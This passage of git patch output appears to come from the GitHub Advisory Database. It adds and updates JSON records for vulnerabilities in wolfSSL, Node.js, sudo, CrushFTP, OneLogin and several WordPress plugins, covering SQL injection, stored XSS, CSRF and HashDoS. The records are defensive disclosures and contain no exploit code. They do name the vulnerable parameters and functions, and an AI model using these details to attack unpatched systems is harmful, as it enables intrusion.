b/advisories/unreviewed/2025/07/GHSA-gwf6-g75x-69vq/GHSA-gwf6-g75x-69vq.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwf6-g75x-69vq", + "modified": "2025-07-19T00:32:31Z", + "published": "2025-07-19T00:32:31Z", + "aliases": [ + "CVE-2025-7814" + ], + "details": "A vulnerability classified as critical was found in code-projects Food Ordering Review System 1.0. This vulnerability affects unknown code of the file /pages/signup_function.php. The manipulation of the argument fname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7814" + }, + { + "type": "WEB", + "url": "https://github.com/n0name-yang/myCVE/issues/4" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316918" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316918" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616770" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T22:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-h9v3-wvxh-4mwp/GHSA-h9v3-wvxh-4mwp.json b/advisories/unreviewed/2025/07/GHSA-h9v3-wvxh-4mwp/GHSA-h9v3-wvxh-4mwp.json new file mode 100644 index 0000000000000..f39900c30cd8d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-h9v3-wvxh-4mwp/GHSA-h9v3-wvxh-4mwp.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h9v3-wvxh-4mwp", + "modified": "2025-07-19T00:32:31Z", + "published": "2025-07-19T00:32:31Z", + "aliases": [ + "CVE-2025-7396" + ], + "details": "In wolfSSL release 5.8.2 blinding support is turned on by default for Curve25519 in applicable builds. The blinding configure option is only for the base C implementation of Curve25519. It is not needed, or available with; ARM assembly builds, Intel assembly builds, and the small Curve25519 feature. While the side-channel attack on extracting a private key would be very difficult to execute in practice, enabling blinding provides an additional layer of protection for devices that may be more susceptible to physical access or side-channel observation.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:P/AC:H/AT:P/PR:L/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7396" + }, + { + "type": "WEB", + "url": "https://github.com/wolfSSL/wolfssl/blob/master/ChangeLog.md#wolfssl-release-582-july-17-2025" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T23:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jgh6-fqf6-cpj8/GHSA-jgh6-fqf6-cpj8.json b/advisories/unreviewed/2025/07/GHSA-jgh6-fqf6-cpj8/GHSA-jgh6-fqf6-cpj8.json new file mode 100644 index 0000000000000..82f8d13505513 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-jgh6-fqf6-cpj8/GHSA-jgh6-fqf6-cpj8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jgh6-fqf6-cpj8", + "modified": "2025-07-19T00:32:31Z", + "published": "2025-07-19T00:32:31Z", + "aliases": [ + "CVE-2025-7394" + ], + "details": "In the OpenSSL compatibility layer implementation, the function RAND_poll() was not behaving as expected and leading to the potential for predictable values returned from RAND_bytes() after fork() is called. This can lead to weak or predictable random numbers generated in applications that are both using RAND_bytes() and doing fork() operations. This only affects applications explicitly calling RAND_bytes() after fork() and does not affect any internal TLS operations. Although RAND_bytes() documentation in OpenSSL calls out not being safe for use with fork() without first calling RAND_poll(), an additional code change was also made in wolfSSL to make RAND_bytes() behave similar to OpenSSL after a fork() call without calling RAND_poll(). Now the Hash-DRBG used gets reseeded after detecting running in a new process. If making use of RAND_bytes() and calling fork() we recommend updating to the latest version of wolfSSL. Thanks to Per Allansson from Appgate for the report.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7394" + }, + { + "type": "WEB", + "url": "https://github.com/wolfSSL/wolfssl/blob/master/ChangeLog.md#wolfssl-release-582-july-17-2025" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T23:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-qr33-gf7m-pq45/GHSA-qr33-gf7m-pq45.json b/advisories/unreviewed/2025/07/GHSA-qr33-gf7m-pq45/GHSA-qr33-gf7m-pq45.json new file mode 100644 index 0000000000000..3b5dc0932afae --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-qr33-gf7m-pq45/GHSA-qr33-gf7m-pq45.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qr33-gf7m-pq45", + "modified": "2025-07-19T00:32:31Z", + "published": "2025-07-19T00:32:31Z", + "aliases": [ + "CVE-2025-27209" + ], + "details": "The V8 release used in Node.js v24.0.0 has changed how string hashes are computed using rapidhash. This implementation re-introduces the HashDoS vulnerability as an attacker who can control the strings to be hashed can generate many hash collisions - an attacker can generate collisions even without knowing the hash-seed.\n\n* This vulnerability affects Node.js v24.x users.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27209" + }, + { + "type": "WEB", + "url": "https://nodejs.org/en/blog/vulnerability/july-2025-security-releases" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T23:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-x33r-pvvq-wjrh/GHSA-x33r-pvvq-wjrh.json b/advisories/unreviewed/2025/07/GHSA-x33r-pvvq-wjrh/GHSA-x33r-pvvq-wjrh.json new file mode 100644 index 0000000000000..f49f3cdd41d98 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-x33r-pvvq-wjrh/GHSA-x33r-pvvq-wjrh.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x33r-pvvq-wjrh", + "modified": "2025-07-19T00:32:31Z", + "published": "2025-07-19T00:32:31Z", + "aliases": [ + "CVE-2025-27210" + ], + "details": "An incomplete fix has been identified for CVE-2025-23084 in Node.js, specifically affecting Windows device names like CON, PRN, and AUX. \n\nThis vulnerability affects Windows users of `path.join` API.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27210" + }, + { + "type": "WEB", + "url": "https://nodejs.org/en/blog/vulnerability/july-2025-security-releases" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T23:15:23Z" + } +} \ No newline at end of file From 22320cc840b7b9bca62a2ea5d95c21b1894753f5 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 19 Jul 2025 03:31:54 +0000 Subject: [PATCH 024/323] Publish Advisories GHSA-763f-93r5-54qv GHSA-8hg9-rcgr-qwwm GHSA-cr97-553h-m39w GHSA-pg35-89w5-5c5h GHSA-695j-c63m-mvxc GHSA-c5x2-97hm-x895 GHSA-3gwr-hghm-q2cx GHSA-c3ff-5gv5-x864 GHSA-h5m7-mc3w-m685 GHSA-rh5q-v9ww-rqgm GHSA-v8xm-rjfr-cfhm GHSA-w33w-3gfg-x6cm GHSA-x5hr-8qw3-j34j --- .../GHSA-763f-93r5-54qv.json | 6 ++- .../GHSA-8hg9-rcgr-qwwm.json | 6 ++- .../GHSA-cr97-553h-m39w.json | 6 ++- .../GHSA-pg35-89w5-5c5h.json | 6 ++- .../GHSA-695j-c63m-mvxc.json | 6 ++- .../GHSA-c5x2-97hm-x895.json | 6 ++- .../GHSA-3gwr-hghm-q2cx.json | 40 +++++++++++++++++ .../GHSA-c3ff-5gv5-x864.json | 44 +++++++++++++++++++ .../GHSA-h5m7-mc3w-m685.json | 44 +++++++++++++++++++ .../GHSA-rh5q-v9ww-rqgm.json | 10 ++++- .../GHSA-v8xm-rjfr-cfhm.json | 44 +++++++++++++++++++ .../GHSA-w33w-3gfg-x6cm.json | 40 +++++++++++++++++ .../GHSA-x5hr-8qw3-j34j.json | 40 +++++++++++++++++ 13 files changed, 291 insertions(+), 7 deletions(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-3gwr-hghm-q2cx/GHSA-3gwr-hghm-q2cx.json create mode 100644 advisories/unreviewed/2025/07/GHSA-c3ff-5gv5-x864/GHSA-c3ff-5gv5-x864.json create mode 100644 advisories/unreviewed/2025/07/GHSA-h5m7-mc3w-m685/GHSA-h5m7-mc3w-m685.json create mode 100644 advisories/unreviewed/2025/07/GHSA-v8xm-rjfr-cfhm/GHSA-v8xm-rjfr-cfhm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-w33w-3gfg-x6cm/GHSA-w33w-3gfg-x6cm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-x5hr-8qw3-j34j/GHSA-x5hr-8qw3-j34j.json diff --git a/advisories/unreviewed/2025/03/GHSA-763f-93r5-54qv/GHSA-763f-93r5-54qv.json b/advisories/unreviewed/2025/03/GHSA-763f-93r5-54qv/GHSA-763f-93r5-54qv.json index 8bb11c1c1e9ab..59c449474d9fa 100644 --- a/advisories/unreviewed/2025/03/GHSA-763f-93r5-54qv/GHSA-763f-93r5-54qv.json +++ b/advisories/unreviewed/2025/03/GHSA-763f-93r5-54qv/GHSA-763f-93r5-54qv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-763f-93r5-54qv", - "modified": "2025-03-19T21:30:45Z", + "modified": "2025-07-19T03:30:19Z", "published": "2025-03-12T18:32:53Z", "aliases": [ "CVE-2025-25567" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25567" }, + { + "type": "WEB", + "url": "https://filecenter.softether-upload.com/d/250715_001_79538/CVE-2025-25567.pdf" + }, { "type": "WEB", "url": "https://lzydry.github.io/CVE-2025-25567" diff --git a/advisories/unreviewed/2025/03/GHSA-8hg9-rcgr-qwwm/GHSA-8hg9-rcgr-qwwm.json b/advisories/unreviewed/2025/03/GHSA-8hg9-rcgr-qwwm/GHSA-8hg9-rcgr-qwwm.json index 57b8d9327bf12..d16626b67590d 100644 --- a/advisories/unreviewed/2025/03/GHSA-8hg9-rcgr-qwwm/GHSA-8hg9-rcgr-qwwm.json +++ b/advisories/unreviewed/2025/03/GHSA-8hg9-rcgr-qwwm/GHSA-8hg9-rcgr-qwwm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8hg9-rcgr-qwwm", - "modified": "2025-03-12T18:32:53Z", + "modified": "2025-07-19T03:30:19Z", "published": "2025-03-12T18:32:53Z", "aliases": [ "CVE-2025-25566" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25566" }, + { + "type": "WEB", + "url": "https://filecenter.softether-upload.com/d/250715_001_79538/CVE-2025-25566.pdf" + }, { "type": "WEB", "url": "https://lzydry.github.io/CVE-2025-25566" diff --git a/advisories/unreviewed/2025/03/GHSA-cr97-553h-m39w/GHSA-cr97-553h-m39w.json b/advisories/unreviewed/2025/03/GHSA-cr97-553h-m39w/GHSA-cr97-553h-m39w.json index 6ca574e287835..dcab91e0e4b97 100644 --- a/advisories/unreviewed/2025/03/GHSA-cr97-553h-m39w/GHSA-cr97-553h-m39w.json +++ b/advisories/unreviewed/2025/03/GHSA-cr97-553h-m39w/GHSA-cr97-553h-m39w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cr97-553h-m39w", - "modified": "2025-03-19T21:30:45Z", + "modified": "2025-07-19T03:30:19Z", "published": "2025-03-12T18:32:53Z", "aliases": [ "CVE-2025-25568" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25568" }, + { + "type": "WEB", + "url": "https://filecenter.softether-upload.com/d/250715_001_79538/CVE-2025-25568.pdf" + }, { "type": "WEB", "url": "https://lzydry.github.io/CVE-2025-25568" diff --git a/advisories/unreviewed/2025/03/GHSA-pg35-89w5-5c5h/GHSA-pg35-89w5-5c5h.json b/advisories/unreviewed/2025/03/GHSA-pg35-89w5-5c5h/GHSA-pg35-89w5-5c5h.json index 3b7a35851c826..952088912511c 100644 --- a/advisories/unreviewed/2025/03/GHSA-pg35-89w5-5c5h/GHSA-pg35-89w5-5c5h.json +++ b/advisories/unreviewed/2025/03/GHSA-pg35-89w5-5c5h/GHSA-pg35-89w5-5c5h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pg35-89w5-5c5h", - "modified": "2025-03-19T21:30:45Z", + "modified": "2025-07-19T03:30:18Z", "published": "2025-03-12T18:32:53Z", "aliases": [ "CVE-2025-25565" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25565" }, + { + "type": "WEB", + "url": "https://filecenter.softether-upload.com/d/250715_001_79538/CVE-2025-25565.pdf" + }, { "type": "WEB", "url": "https://lzydry.github.io/CVE-2025-25565" diff --git a/advisories/unreviewed/2025/06/GHSA-695j-c63m-mvxc/GHSA-695j-c63m-mvxc.json b/advisories/unreviewed/2025/06/GHSA-695j-c63m-mvxc/GHSA-695j-c63m-mvxc.json index f909fa6f6c3fd..9c11c64489c46 100644 --- a/advisories/unreviewed/2025/06/GHSA-695j-c63m-mvxc/GHSA-695j-c63m-mvxc.json +++ b/advisories/unreviewed/2025/06/GHSA-695j-c63m-mvxc/GHSA-695j-c63m-mvxc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-695j-c63m-mvxc", - "modified": "2025-07-18T18:30:27Z", + "modified": "2025-07-19T03:30:19Z", "published": "2025-06-30T21:30:54Z", "aliases": [ "CVE-2025-32463" @@ -63,6 +63,10 @@ "type": "WEB", "url": "https://www.sudo.ws/security/advisories" }, + { + "type": "WEB", + "url": "https://www.sudo.ws/security/advisories/chroot_bug" + }, { "type": "WEB", "url": "https://www.suse.com/security/cve/CVE-2025-32463.html" diff --git a/advisories/unreviewed/2025/06/GHSA-c5x2-97hm-x895/GHSA-c5x2-97hm-x895.json b/advisories/unreviewed/2025/06/GHSA-c5x2-97hm-x895/GHSA-c5x2-97hm-x895.json index 6ec911788621b..cd0f49802b5e4 100644 --- a/advisories/unreviewed/2025/06/GHSA-c5x2-97hm-x895/GHSA-c5x2-97hm-x895.json +++ b/advisories/unreviewed/2025/06/GHSA-c5x2-97hm-x895/GHSA-c5x2-97hm-x895.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c5x2-97hm-x895", - "modified": "2025-07-09T18:30:40Z", + "modified": "2025-07-19T03:30:19Z", "published": "2025-06-30T21:30:54Z", "aliases": [ "CVE-2025-32462" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://www.sudo.ws/security/advisories" + }, + { + "type": "WEB", + "url": "https://www.sudo.ws/security/advisories/host_any" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/07/GHSA-3gwr-hghm-q2cx/GHSA-3gwr-hghm-q2cx.json b/advisories/unreviewed/2025/07/GHSA-3gwr-hghm-q2cx/GHSA-3gwr-hghm-q2cx.json new file mode 100644 index 0000000000000..b44a586fa0cff --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-3gwr-hghm-q2cx/GHSA-3gwr-hghm-q2cx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3gwr-hghm-q2cx", + "modified": "2025-07-19T03:30:20Z", + "published": "2025-07-19T03:30:20Z", + "aliases": [ + "CVE-2025-52924" + ], + "details": "In One Identity OneLogin before 2025.2.0, the SQL connection \"application name\" is set based on the value of an untrusted X-RequestId HTTP request header.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52924" + }, + { + "type": "WEB", + "url": "https://oneidentity.com" + }, + { + "type": "WEB", + "url": "https://onelogin.service-now.com/support?id=kb_article&sys_id=59fe4c3c972a2610c90c3b0e6253afef&kb_category=a0d76d70db185340d5505eea4b96199f" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T03:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-c3ff-5gv5-x864/GHSA-c3ff-5gv5-x864.json b/advisories/unreviewed/2025/07/GHSA-c3ff-5gv5-x864/GHSA-c3ff-5gv5-x864.json new file mode 100644 index 0000000000000..5b4df226911e1 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-c3ff-5gv5-x864/GHSA-c3ff-5gv5-x864.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c3ff-5gv5-x864", + "modified": "2025-07-19T03:30:20Z", + "published": "2025-07-19T03:30:20Z", + "aliases": [ + "CVE-2025-7658" + ], + "details": "The Temporarily Hidden Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'temphc-start' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7658" + }, + { + "type": "WEB", + "url": "https://plugins.svn.wordpress.org/temporarily-hidden-content/trunk/includes/class-temporarily-hidden-content-public.php" + }, + { + "type": "WEB", + "url": "https://plugins.svn.wordpress.org/temporarily-hidden-content/trunk/templates/countdown_view.tpl" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/67afe49c-3560-414b-b848-b91a03bf7556?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T03:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-h5m7-mc3w-m685/GHSA-h5m7-mc3w-m685.json b/advisories/unreviewed/2025/07/GHSA-h5m7-mc3w-m685/GHSA-h5m7-mc3w-m685.json new file mode 100644 index 0000000000000..2b138b6b818a2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-h5m7-mc3w-m685/GHSA-h5m7-mc3w-m685.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h5m7-mc3w-m685", + "modified": "2025-07-19T03:30:20Z", + "published": "2025-07-19T03:30:20Z", + "aliases": [ + "CVE-2025-7655" + ], + "details": "The Live Stream Badger plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'livestream' shortcode in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7655" + }, + { + "type": "WEB", + "url": "https://plugins.svn.wordpress.org/live-stream-badger/tags/1.4.3/shortcode/class-embedded-stream.php" + }, + { + "type": "WEB", + "url": "https://plugins.svn.wordpress.org/live-stream-badger/tags/1.4.3/view/class-embedded-twitch-view.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/22a30301-f409-4c53-84d7-7799fb41c25b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T03:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rh5q-v9ww-rqgm/GHSA-rh5q-v9ww-rqgm.json b/advisories/unreviewed/2025/07/GHSA-rh5q-v9ww-rqgm/GHSA-rh5q-v9ww-rqgm.json index 680c4c2ddebc0..e14d00aeb3bdd 100644 --- a/advisories/unreviewed/2025/07/GHSA-rh5q-v9ww-rqgm/GHSA-rh5q-v9ww-rqgm.json +++ b/advisories/unreviewed/2025/07/GHSA-rh5q-v9ww-rqgm/GHSA-rh5q-v9ww-rqgm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rh5q-v9ww-rqgm", - "modified": "2025-07-18T21:30:30Z", + "modified": "2025-07-19T03:30:20Z", "published": "2025-07-18T21:30:30Z", "aliases": [ "CVE-2025-54309" @@ -19,9 +19,17 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54309" }, + { + "type": "WEB", + "url": "https://www.bleepingcomputer.com/news/security/crushftp-zero-day-exploited-in-attacks-to-gain-admin-access-on-servers" + }, { "type": "WEB", "url": "https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025" + }, + { + "type": "WEB", + "url": "https://www.rapid7.com/blog/post/crushftp-zero-day-exploited-in-the-wild" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/07/GHSA-v8xm-rjfr-cfhm/GHSA-v8xm-rjfr-cfhm.json b/advisories/unreviewed/2025/07/GHSA-v8xm-rjfr-cfhm/GHSA-v8xm-rjfr-cfhm.json new file mode 100644 index 0000000000000..68f43a10a0f4c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-v8xm-rjfr-cfhm/GHSA-v8xm-rjfr-cfhm.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v8xm-rjfr-cfhm", + "modified": "2025-07-19T03:30:20Z", + "published": "2025-07-19T03:30:20Z", + "aliases": [ + "CVE-2025-7669" + ], + "details": "The Avishi WP PayPal Payment Button plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0. This is due to missing or incorrect nonce validation on the 'avishi-wp-paypal-payment-button/index.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7669" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/avishi-wp-paypal-payment-button/trunk/index.php" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/avishi-wp-paypal-payment-button" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8416b394-28ae-41de-8784-2ae39f4d201f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T03:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-w33w-3gfg-x6cm/GHSA-w33w-3gfg-x6cm.json b/advisories/unreviewed/2025/07/GHSA-w33w-3gfg-x6cm/GHSA-w33w-3gfg-x6cm.json new file mode 100644 index 0000000000000..5fb41dded504e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-w33w-3gfg-x6cm/GHSA-w33w-3gfg-x6cm.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w33w-3gfg-x6cm", + "modified": "2025-07-19T03:30:20Z", + "published": "2025-07-19T03:30:20Z", + "aliases": [ + "CVE-2025-7653" + ], + "details": "The EPay.bg Payments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'epay' shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7653" + }, + { + "type": "WEB", + "url": "https://plugins.svn.wordpress.org/epaybg-payments/tags/0.1/epay-payments.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7e35e79a-4838-4ed9-bd08-80e8f9043ec4?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T03:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-x5hr-8qw3-j34j/GHSA-x5hr-8qw3-j34j.json b/advisories/unreviewed/2025/07/GHSA-x5hr-8qw3-j34j/GHSA-x5hr-8qw3-j34j.json new file mode 100644 index 0000000000000..2ee45cc42e79f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-x5hr-8qw3-j34j/GHSA-x5hr-8qw3-j34j.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x5hr-8qw3-j34j", + "modified": "2025-07-19T03:30:20Z", + "published": "2025-07-19T03:30:20Z", + "aliases": [ + "CVE-2025-7661" + ], + "details": "The Partnerský systém Martinus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'martinus' shortcode in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7661" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/martinus-partnersky-system/tags/1.7.1/martinus-pp.php#L266" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6500b559-4c26-47e8-b131-100ece3ca3bd?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T03:15:23Z" + } +} \ No newline at end of file From bfbd73d2846fec754191965c461799b6a045795c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 19 Jul 2025 06:32:20 +0000 Subject: [PATCH 025/323] Publish Advisories GHSA-4qgj-c63p-26g3 GHSA-j8w3-hxm2-cw7f GHSA-p35r-m625-775f GHSA-vjh6-vph2-j2q4 GHSA-xf7h-qhx6-p3pv --- .../GHSA-4qgj-c63p-26g3.json | 44 +++++++++++++++++ .../GHSA-j8w3-hxm2-cw7f.json | 48 +++++++++++++++++++ .../GHSA-p35r-m625-775f.json | 48 +++++++++++++++++++ .../GHSA-vjh6-vph2-j2q4.json 